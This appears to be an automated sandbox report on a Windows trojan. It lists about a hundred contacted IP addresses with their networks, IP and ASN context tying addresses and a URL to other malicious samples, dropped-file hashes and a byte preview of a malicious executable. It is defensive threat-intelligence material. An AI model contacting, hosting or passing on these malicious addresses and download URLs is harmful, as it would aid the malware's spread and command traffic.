213.165.178.214 | unknown | Malta | 12709 | MELITACABLEMT | true
80.158.35.51 | unknown | Germany | 6878 | AS6878DE | true
119.228.75.211 | unknown | Japan | 17511 | OPTAGEOPTAGEIncJP | true
46.105.131.68 | unknown | France | 16276 | OVHFR | true
192.163.221.191 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
190.192.39.136 | unknown | Argentina | 10481 | TelecomArgentinaSAAR | true
87.106.136.232 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
80.158.43.136 | unknown | Germany | 6878 | AS6878DE | true
80.158.59.174 | unknown | Germany | 6878 | AS6878DE | true
157.7.164.178 | unknown | Japan | 7506 | INTERQGMOInternetIncJP | true
60.108.128.186 | unknown | Japan | 17676 | GIGAINFRASoftbankBBCorpJP | true
115.79.59.157 | unknown | Viet Nam | 7552 | VIETEL-AS-APViettelGroupVN | true
80.158.3.161 | unknown | Germany | 6878 | AS6878DE | true
192.241.220.183 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
113.203.238.130 | unknown | Pakistan | 9387 | AUGERE-PKAUGERE-PakistanPK | true
190.55.186.229 | unknown | Argentina | 27747 | TelecentroSAAR | true
58.27.215.3 | unknown | Pakistan | 38264 | WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPK | true
41.185.29.128 | unknown | South Africa | 36943 | GridhostZA | true
91.75.75.46 | unknown | United Arab Emirates | 15802 | DU-AS1AE | true
95.76.142.243 | unknown | Romania | 6830 | LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding | true
190.144.18.198 | unknown | Colombia | 14080 | TelmexColombiaSACO | false
2.58.16.86 | unknown | Latvia | 64421 | SERTEX-ASLV | true
2.82.75.215 | unknown | Portugal | 3243 | MEO-RESIDENCIALPT | true
188.166.220.180 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
115.79.195.246 | unknown | Viet Nam | 7552 | VIETEL-AS-APViettelGroupVN | true
                                                                                                              179.5.118.12
                                                                                                              unknownEl Salvador
                                                                                                              14754TelguaGTtrue
                                                                                                              192.210.217.94
                                                                                                              unknownUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              58.94.58.13
                                                                                                              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                                                                                                              185.208.226.142
                                                                                                              unknownHungary
                                                                                                              43359TARHELYHUtrue
                                                                                                              41.76.213.144
                                                                                                              unknownSouth Africa
                                                                                                              37611AfrihostZAtrue
                                                                                                              223.17.215.76
                                                                                                              unknownHong Kong
                                                                                                              18116HGC-AS-APHGCGlobalCommunicationsLimitedHKtrue
                                                                                                              75.127.14.170
                                                                                                              unknownUnited States
                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                              172.96.190.154
                                                                                                              unknownCanada
                                                                                                              59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                                              109.206.139.119
                                                                                                              unknownRussian Federation
                                                                                                              47914CDMSRUtrue
                                                                                                              80.158.53.167
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              152.32.75.74
                                                                                                              unknownPhilippines
                                                                                                              17639CONVERGE-ASConvergeICTSolutionsIncPHtrue
                                                                                                              103.229.73.17
                                                                                                              unknownIndonesia
                                                                                                              55660MWN-AS-IDPTMasterWebNetworkIDtrue
                                                                                                              80.158.51.209
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              178.33.167.120
                                                                                                              unknownFrance
                                                                                                              16276OVHFRtrue
                                                                                                              5.79.70.250
                                                                                                              unknownNetherlands
                                                                                                              60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                                                                                              120.51.34.254
                                                                                                              unknownJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                                                                              85.246.78.192
                                                                                                              unknownPortugal
                                                                                                              3243MEO-RESIDENCIALPTtrue
                                                                                                              117.2.139.117
                                                                                                              unknownViet Nam
                                                                                                              7552VIETEL-AS-APViettelGroupVNtrue
                                                                                                              103.93.220.182
                                                                                                              unknownPhilippines
                                                                                                              17639CONVERGE-ASConvergeICTSolutionsIncPHtrue
                                                                                                              37.205.9.252
                                                                                                              unknownCzech Republic
                                                                                                              24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                              172.105.78.244
                                                                                                              unknownUnited States
                                                                                                              63949LINODE-APLinodeLLCUStrue
                                                                                                              37.46.129.215
                                                                                                              unknownRussian Federation
                                                                                                              29182THEFIRST-ASRUtrue
                                                                                                              121.117.147.153
                                                                                                              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                                                                                                              110.37.224.243
                                                                                                              unknownPakistan
                                                                                                              38264WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPKtrue
                                                                                                              180.148.4.130
                                                                                                              unknownViet Nam
                                                                                                              45557VNTT-AS-VNVietnamTechnologyandTelecommunicationJSCVNtrue
                                                                                                              116.202.10.123
                                                                                                              unknownGermany
                                                                                                              24940HETZNER-ASDEtrue
                                                                                                              177.130.51.198
                                                                                                              unknownBrazil
                                                                                                              52747WspServicosdeTelecomunicacoesLtdaBRtrue
                                                                                                              153.229.219.1
                                                                                                              unknownJapan4713OCNNTTCommunicationsCorporationJPtrue
                                                                                                              203.56.191.129
                                                                                                              unknownAustralia
                                                                                                              38220AMAZE-SYD-AS-APwwwamazecomauAUtrue
                                                                                                              189.123.103.233
                                                                                                              unknownBrazil
                                                                                                              28573CLAROSABRtrue
                                                                                                              54.38.143.245
                                                                                                              unknownFrance
                                                                                                              16276OVHFRtrue
                                                                                                              77.74.78.80
                                                                                                              unknownRussian Federation
                                                                                                              31261GARS-ASMoscowRussiaRUtrue
                                                                                                              5.2.164.75
                                                                                                              unknownRomania
                                                                                                              8708RCS-RDS73-75DrStaicoviciROtrue
                                                                                                              190.212.140.6
                                                                                                              unknownNicaragua
                                                                                                              14754TelguaGTtrue
                                                                                                              8.4.9.137
                                                                                                              unknownUnited States
                                                                                                              3356LEVEL3UStrue
                                                                                                              202.29.237.113
                                                                                                              unknownThailand
                                                                                                              4621UNINET-AS-APUNINET-THtrue
                                                                                                              79.133.6.236
                                                                                                              unknownFinland
                                                                                                              3238ALCOMFItrue
                                                                                                              185.80.172.199
                                                                                                              unknownAzerbaijan
                                                                                                              39232UNINETAZtrue
                                                                                                              74.208.173.91
                                                                                                              unknownUnited States
                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                              188.80.27.54
                                                                                                              unknownPortugal
                                                                                                              3243MEO-RESIDENCIALPTtrue
                                                                                                              139.59.61.215
                                                                                                              unknownSingapore
                                                                                                              14061DIGITALOCEAN-ASNUStrue
                                                                                                              175.103.38.146
                                                                                                              unknownIndonesia
                                                                                                              38320MMS-AS-IDPTMaxindoMitraSolusiIDtrue
                                                                                                              50.116.78.109
                                                                                                              unknownUnited States
                                                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                                                              109.13.179.195
                                                                                                              unknownFrance
                                                                                                              15557LDCOMNETFRtrue
                                                                                                              42.200.96.63
                                                                                                              unknownHong Kong
                                                                                                              4760HKTIMS-APHKTLimitedHKtrue
                                                                                                              73.100.19.104
                                                                                                              unknownUnited States
                                                                                                              7922COMCAST-7922UStrue
                                                                                                              109.99.146.210
                                                                                                              unknownRomania
                                                                                                              9050RTDBucharestRomaniaROtrue
                                                                                                              187.193.221.143
                                                                                                              unknownMexico
                                                                                                              8151UninetSAdeCVMXtrue
                                                                                                              80.158.63.78
                                                                                                              unknownGermany
                                                                                                              6878AS6878DEtrue
                                                                                                              198.20.228.9
                                                                                                              unknownUnited States
                                                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                                                              185.142.236.163
                                                                                                              unknownNetherlands
                                                                                                              174COGENT-174UStrue
                                                                                                              79.143.178.194
                                                                                                              unknownGermany
                                                                                                              51167CONTABODEfalse
                                                                                                              73.55.128.120
                                                                                                              unknownUnited States
                                                                                                              7922COMCAST-7922UStrue
                                                                                                              178.254.36.182
                                                                                                              unknownGermany
                                                                                                              42730EVANZOASDEtrue
                                                                                                              200.243.153.66
                                                                                                              unknownBrazil
                                                                                                              4230CLAROSABRtrue
                                                                                                              91.83.93.103
                                                                                                              unknownHungary
                                                                                                              12301INVITECHHUtrue
                                                                                                              195.201.56.70
                                                                                                              unknownGermany
                                                                                                              24940HETZNER-ASDEtrue

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356776
Start date: 23.02.2021
Start time: 16:27:44
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: MV9tCJw8Xr (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 39
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@42/7@0/100
EGA Information: Failed
HDC Information:
• Successful, ratio: 36.8% (good quality ratio 35.4%)
• Quality average: 78.4%
• Quality standard deviation: 26.2%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.211.6.115, 52.255.188.83, 104.43.139.144, 52.147.198.201, 184.30.24.56, 51.11.168.160, 2.20.142.210, 2.20.142.209, 51.103.5.186, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:28:48 | API Interceptor | 12x Sleep call for process: svchost.exe modified
16:29:55 | API Interceptor | 43x Sleep call for process: tokenbinding2.exe modified
16:30:00 | API Interceptor | 19x Sleep call for process: KBDHEB.exe modified
16:30:02 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
16:30:03 | API Interceptor | 42x Sleep call for process: execmodelproxy.exe modified
16:30:07 | API Interceptor | 18x Sleep call for process: COLORCNV.exe modified
16:30:10 | API Interceptor | 16x Sleep call for process: usp10.exe modified
16:30:13 | API Interceptor | 16x Sleep call for process: KBDINTAM.exe modified
16:30:15 | API Interceptor | 16x Sleep call for process: msrd2x40.exe modified
16:30:17 | API Interceptor | 56x Sleep call for process: MCCSEngineShared.exe modified
16:30:23 | API Interceptor | 15x Sleep call for process: jscript9.exe modified
16:30:25 | API Interceptor | 20x Sleep call for process: wmvdspa.exe modified
16:30:27 | API Interceptor | 24x Sleep call for process: msvcr100_clr0400.exe modified
16:30:32 | API Interceptor | 52x Sleep call for process: catsrvut.exe modified
16:30:37 | API Interceptor | 6x Sleep call for process: mprdim.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
183.91.3.63 | Payment Advice Note ZRC-2020 (1).doc | malicious |
78.90.78.210 | R61XWXC9k8.exe | malicious | 78.90.78.210/0VYXuszjjV9agbWXA/UsGPucg8JiPZ8n9Rjia/
143.95.101.72 | Payment Advice Note ZRC-2020 (1).doc | malicious | 143.95.101.72:8080/Jto4JiPoOoGxpvR0u

                                                                                                                Domains

                                                                                                                No context

ASN

Match | Associated Sample Name / URL | Detection | Context
GIGAINFRA Softbank BB Corp JP | Io8ic2291n.doc | malicious | 60.93.23.51
GIGAINFRA Softbank BB Corp JP | mozi.a.zip | malicious | 126.172.220.14
GIGAINFRA Softbank BB Corp JP | yVn2ywuhEC.exe | malicious | 126.142.30.153
GIGAINFRA Softbank BB Corp JP | WUHU95Apq3 | malicious | 126.248.249.117
GIGAINFRA Softbank BB Corp JP | bin.sh | malicious | 221.65.136.75
GIGAINFRA Softbank BB Corp JP | oHqMFmPndx.exe | malicious | 221.65.97.214
GIGAINFRA Softbank BB Corp JP | mssecsvr.exe | malicious | 218.126.250.41
GIGAINFRA Softbank BB Corp JP | mssecsvc.exe | malicious | 219.38.241.57
GIGAINFRA Softbank BB Corp JP | i | malicious | 126.3.151.91
GIGAINFRA Softbank BB Corp JP | Mozi.m | malicious | 220.42.145.217
GIGAINFRA Softbank BB Corp JP | NormhjTcQb.exe | malicious | 219.7.160.234
GIGAINFRA Softbank BB Corp JP | xJbFpiVs1l | malicious | 126.168.139.190
GIGAINFRA Softbank BB Corp JP | SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe | malicious | 60.130.86.188
GIGAINFRA Softbank BB Corp JP | RB1NsQ9LQf.exe | malicious | 219.40.58.2
GIGAINFRA Softbank BB Corp JP | QtieMVP6yx.exe | malicious | 60.125.114.64
GIGAINFRA Softbank BB Corp JP | 8jpKEFc5Ow.exe | malicious | 60.125.114.64
GIGAINFRA Softbank BB Corp JP | 0ZAAMcf57j.exe | malicious | 60.125.114.64
GIGAINFRA Softbank BB Corp JP | mssecsvc.exe | malicious | 126.24.86.250
GIGAINFRA Softbank BB Corp JP | uLZjwyI1Kl.exe | malicious | 60.125.114.64
GIGAINFRA Softbank BB Corp JP | IjM6lDVS1Q.exe | malicious | 60.125.114.64
OCN NTT Communications Corporation JP | networkmanager | malicious | 223.216.42.27
OCN NTT Communications Corporation JP | yVn2ywuhEC.exe | malicious | 118.14.200.58
OCN NTT Communications Corporation JP | WUHU95Apq3 | malicious | 180.24.91.44
OCN NTT Communications Corporation JP | bin.sh | malicious | 153.158.34.130
OCN NTT Communications Corporation JP | fil1 | malicious | 153.145.15.179
OCN NTT Communications Corporation JP | mssecsvc.exe | malicious | 180.55.191.70
OCN NTT Communications Corporation JP | SCAN_20210112140930669.exe | malicious | 210.145.8.133
OCN NTT Communications Corporation JP | Mozi.m | malicious | 210.163.103.147
OCN NTT Communications Corporation JP | svchost.exe | malicious | 153.198.99.66
OCN NTT Communications Corporation JP | utox.exe | malicious | 153.128.43.119
OCN NTT Communications Corporation JP | fdwv4hWF1M.exe | malicious | 165.241.109.96
OCN NTT Communications Corporation JP | SecuriteInfo.com.Trojan.BtcMine.3311.17146.exe | malicious | 153.201.75.182
OCN NTT Communications Corporation JP | http://218.44.255.241/wp-includes/js/nri.exe | malicious | 218.44.255.241
OCN NTT Communications Corporation JP | RB1NsQ9LQf.exe | malicious | 123.224.100.111
OCN NTT Communications Corporation JP | oC636XTURl.exe | malicious | 125.200.20.233
OCN NTT Communications Corporation JP | wRZQL3Nel2.exe | malicious | 125.200.20.233
OCN NTT Communications Corporation JP | CHbIs67FQm.exe | malicious | 125.200.20.233
OCN NTT Communications Corporation JP | FhUuc5CCLj.exe | malicious | 125.200.20.233
OCN NTT Communications Corporation JP | EEqMpQZfeh.exe | malicious | 118.7.227.42
OCN NTT Communications Corporation JP | 8uOajLllk2.exe | malicious | 114.146.222.200
CMCTELECOM-AS-VN CMC Telecom Infrastructure Company VN | DfES2eBy48.exe | malicious | 115.146.127.254
CMCTELECOM-AS-VN CMC Telecom Infrastructure Company VN | 6rR1G3EcvT3djII.exe | malicious | 203.171.27.187
CMCTELECOM-AS-VN CMC Telecom Infrastructure Company VN | gupd.exe | malicious | 183.91.25.185
CMCTELECOM-AS-VN CMC Telecom Infrastructure Company VN | https://baocaotaichinh.vn/thu-vien/file-excel-hop-dong-lao-dong--phu-luc-hdlt--mau-cam-ket-02--quyet-dinh-tang-luong-1485755241-157 | malicious | 103.63.115.9
CMCTELECOM-AS-VN CMC Telecom Infrastructure Company VN | networkservice | malicious | 103.224.169.252

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4096
                                                                                                                Entropy (8bit):0.5864234280410656
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:bQrMk1GaD0JOCEfMuaaD0JOCEfMKQmDA3utAl/gz2cE0fMbhEZolrRSQ2hyYIIT:b4TGaD0JcaaD0JwQQ5tAg/0bjSQJ
                                                                                                                MD5:420636F9F27FD67F2C6D94A15CFD1BE9
                                                                                                                SHA1:EC324F4C9C6CA982825B4922E3B4303DF27007BC
                                                                                                                SHA-256:8FAD09D70E9C7785CD11E63AD669C0D717827C0B037109BA80CD0D64551F8A04
                                                                                                                SHA-512:80CBE485AE72155A9EBA794BA1599DD020FCE93C519DDF4BB189DAEB5E143C2D45148A0BD4FF2C0B320EC9B0D46132B0F88F04649F95ED8E8B14729F65A93F3D
                                                                                                                Malicious:false
                                                                                                                Preview: ....E..h..(.....1....yu.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................1....yu...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcbb7ecd7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):0.09296066254794608
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:LmGzwl/+V3Nlk1RIE11Y8TRX6J/ljtUKlmGzwl/+V3Nlk1RIE11Y8TRX6J/ljtUK:LmG0+VMO4bl6NUKlmG0+VMO4bl6NUK
                                                                                                                MD5:4F3FDB8E42C9C4F83D5568E6993FF453
                                                                                                                SHA1:F5CE02E5E8C22BCBA79FD32335C8229861251A25
                                                                                                                SHA-256:53EE3B7FD8EE66E56512CEE7A6E9A306DF023433CB5D3C1A4F804E608896BF30
                                                                                                                SHA-512:C819A0AC6ADA078C985E30DB40F476B6DF6E29C6229E527D5B7C75818465EC91B03B892A5557EA0F333CCEC931B4A258621DABB343E2A6D9E644B00826892789
                                                                                                                Malicious:false
                                                                                                                Preview: ...... ................e.f.3...w........................&..........w..1....yu.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................F...1....yu...................q.1....yu.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8192
                                                                                                                Entropy (8bit):0.10614204105255072
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:O2X7EvU5h2i8l/bJdAti/7FcQtYll:dXiU98t4AtI
                                                                                                                MD5:94B2529699E7B2E7196E10F4B8D6B6BF
                                                                                                                SHA1:61591CCC9C93B64B4BF8007B013E30ADC20C3151
                                                                                                                SHA-256:92E5DEEC578308C13DB6FF2422705873E61198165B5B6AB3C0081DF1D218A220
                                                                                                                SHA-512:B48C8183C9EA05D8321035CA8C0437F12C9EC57F26CE7EA05317A6DB7C7D3A68D4E63F95321A1F81652D13C729EE3FD0708536901599C130A93CFD24C65148BC
                                                                                                                Malicious:false
                                                                                                                Preview: ...N.....................................3...w..1....yu......w...............w.......w....:O.....w....................q.1....yu.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                C:\Users\user\AppData\Local\Temp\UPDA7CE.tmp
                                                                                                                Process:C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):262176
                                                                                                                Entropy (8bit):7.999303000257025
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:6144:rWZlYSZmYrMEbTOagpAdQQcBsCmL0/LX6PRa0kaud2OZVubg:rIlYSQYIEmDIQQcOCmL0/DGGH8a6g
                                                                                                                MD5:23B7DE7DF2C2A0C72E5D8A016DC56CEA
                                                                                                                SHA1:7FF40DCB94F3084E6432EE086925A1D9C51FA0FE
                                                                                                                SHA-256:8F46B2FBCE6EC7968D5A8FC7B1C8B4255EE0D1BBA75C05BDBB18433F4A28FFAD
                                                                                                                SHA-512:B945A9A4896639A160251CB322ACB900EE0EC6F8231F7BED7171AFA6ACF2092ABAAE16756758AB452AB212279DED1A004DA892BAAC729082E8B500497765E9FE
                                                                                                                Malicious:false
                                                                                                                Preview: ....cE,.w;..$d......*H.8Hh.<...........J....?.[...?._.C;.j.1..O*u.g}z.....b.8.5.A.L..<)>r.V.q ........|2.a..E...}..i,f-.!.`.X........+n..`GB.).4........E.....cH\..Z3.....V....3...u.......e-..<..(.m_..0"....+.jZ^.H-...)V....k.$r'....Ye..Tp.>.../2.I.NK...j.@........>..!....px7l..A.r.1b..B.=K........19+K.....c..z9..<.{....$.....\.3..<Y=...KC.w.Twm......J.....X.!.q.l~#$.W....K.m...2Hp....B.cc{.c.X...A.*..Dk:.w^..v...{.,.......x......O.`i,D..s....C.J..4c@B....>.'...!:H.3.j.h....@..|..L.r......'..+....ku.:...>..?j{t{..L.j..|.<9Z............~\5.;.4%<|.}WntU.VV.kw...*n..`..M.>T.7.fN=w.f-...6...Ix4B.j5..Z..P._., ...C.1..1aW.".DJxX....r..;Ft.{...J.m..q.O1..2..n..L..5O...K..`d*b....p.0.t.O..W...5.l;TZ./,.K..J...Y-q(..8h;...[......A.....y.@y...f_5{...Yv8O4..C..=`S*.!.....0....Dr.t.\..SS.9p...k.].g....7h Z..bBH.a..c.....e...q .KNV^..0...~{z.4.ok.6.ON.'H.;e%.8:..(!7_.$.#...<....$g...J...l......B#...~Jt...l..%.i..1.?.A8.P......*}..|..F..@..
                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):55
                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                Malicious:false
                                                                                                                Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):906
                                                                                                                Entropy (8bit):3.1423056238932134
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:58KRBubdpkoF1AG3ru0mNok9+MlWlLehB4yAq7ejCL0mNB:OaqdmuF3rUNL+kWReH4yJ7MsNB
                                                                                                                MD5:CDF2B381C7083CB8BC135D000B5D03EC
                                                                                                                SHA1:B4933AE30C306BC37E0DD024F3952EBAFC743B80
                                                                                                                SHA-256:799D61805BAA245FFDE0AC0069FC4928D743432C0A6609C41EAA0D4CA001B9B6
                                                                                                                SHA-512:D2AADDCDD4E0C06C97958FB0E26ED863BAC0D6FE378B97668856F17B59F8137617B2F689B7730D6BABE0DBCA153154BF3EC3EC9B00C8B30D66271171EA51482A
                                                                                                                Malicious:false
                                                                                                                Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.u.e. .. F.e.b. .. 2.3. .. 2.0.2.1. .1.6.:.3.0.:.0.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.u.e. .. F.e.b. .. 2.3. .. 2.0.2.1. .1.6.:.3.0.:.0.2.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                                                                                                                Process:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):662528
                                                                                                                Entropy (8bit):7.405248515976969
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:67IjOJaW6GOcfJeSdwiGPdIGabyhkOl0Rv1:6868RBcfkSd+dIGa2hkpN1
                                                                                                                MD5:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                SHA1:A5653EBE4FA9F906554E56F4D732489189C3A3F9
                                                                                                                SHA-256:90E4F02AB9157F389D785C3DCDDFA432085B237F2A4C3BEFB4A093D0F2711B5B
                                                                                                                SHA-512:517B1728AC24A587C6A4CCB7C0EA18F2059609958EB06F06107EFD5A2E06FAF0CAA78C49F252E8B2E602A88DE194E7EDB1F4AAF1EFE423298E94257C3DF902AE
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: Metadefender, Detection: 59%, Browse
                                                                                                                • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N..@...@...@.y{....@.y{..P.@.y{....@...C...@...E...@...D...@......@...A.G.@.i.I...@.i.....@.......@.i.B...@.Rich..@.........PE..L....h.`.....................:.......o............@..........................`............@.................................$y...........r...................0..@!...[..8............................\..@............................................text...\........................... ..`.rdata.............................@..@.data................v..............@....rsrc....r.......t..................@..@.reloc..@!...0..."..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):6.645626437400774
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:MV9tCJw8Xr.exe
